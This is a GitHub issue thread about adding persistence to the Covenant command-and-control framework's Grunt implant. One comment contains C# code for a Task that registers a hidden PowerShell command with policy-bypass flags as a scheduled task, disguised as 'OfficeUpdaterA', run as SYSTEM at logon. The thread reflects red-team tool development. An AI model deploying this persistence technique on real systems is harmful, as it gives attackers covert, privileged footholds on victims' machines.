Elite icon indicating copy to clipboard operation
Elite copied to clipboard
verified publisher icon cobbr

grunt persistence

Open robomotic opened this issue 6 years ago • 4 comments

Hello, do we have plan to integrate persistence when building the launcher?

Would love to see a basic diagram about the life cycle of a Grunt, currently is based on an encrypted RC4 over https connection right?

Persistence should be an option when building the first implant to make sure we get a connection back after reboots or if something goes wrong.

Let me know your thoughts. :-)

robomotic avatar Jun 20 '19 23:06 robomotic

Hey @robomotic, I definitely would like to add some more persistence options in the near future. I don't envision embedding persistence directly into the implant itself, but likely as post-exploitation Tasks. But if you come up with some a good roadmap for what it might look like in the implant itself, I am open to suggestions.

A life-cycle of a Grunt diagram would be a great idea, I'll add that to the to-do list.

RC4 is not used for encryption. Covenant utilizes an EKE (Encrypted Key Exchange) to negotiate an AES key that is used for encryption. Optionally, ssl can additionally be used if you are communicating over HTTPS.

cobbr avatar Jun 21 '19 03:06 cobbr

Thanks for the clarification, so for the persistence I was thinking something along those lines. Under the Covenant/Data/Tasks we could create one for each type. For example a persistence Taks based on win32 logon could be implemented like this:

using System;
using SharpSploit.Execution;
public static class Task
{
    public static string Execute(string ps_command)
    {
        try
        {
            string ps_path = "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe";
            string ps_flags = "-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c";
            string ps_one_liner = String.Format("{0} {1} {2}",ps_path,ps_flags,ps_command);
            string ShellCommand = String.Format("schtasks /create /tn OfficeUpdaterA /tr \"{0}\" /sc onlogon /ru System",ps_one_liner);
            return Shell.ShellCmdExecute(ShellCommand);
        }
        catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
    }
}

Now the ps_command should include the actual one liner of the Grunt implant. Is there a way to inherit that from the Grunt executing the Task otherwise you will have to pass that in the method which is not elegant. Important to remember that this kind of approach is limited by the max chars in the commandline.

If this is possible I can easily port the following methods as https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1.

Cheers.

robomotic avatar Sep 25 '19 11:09 robomotic

Hey @robomotic , I'd recommend heading over to the Covenant github page at https://github.com/cobbr/Covenant

There are a few persistence Tasks built-in now. But feel free to add new ones!

cobbr avatar Sep 25 '19 13:09 cobbr

Wow you have been busy!

robomotic avatar Sep 26 '19 22:09 robomotic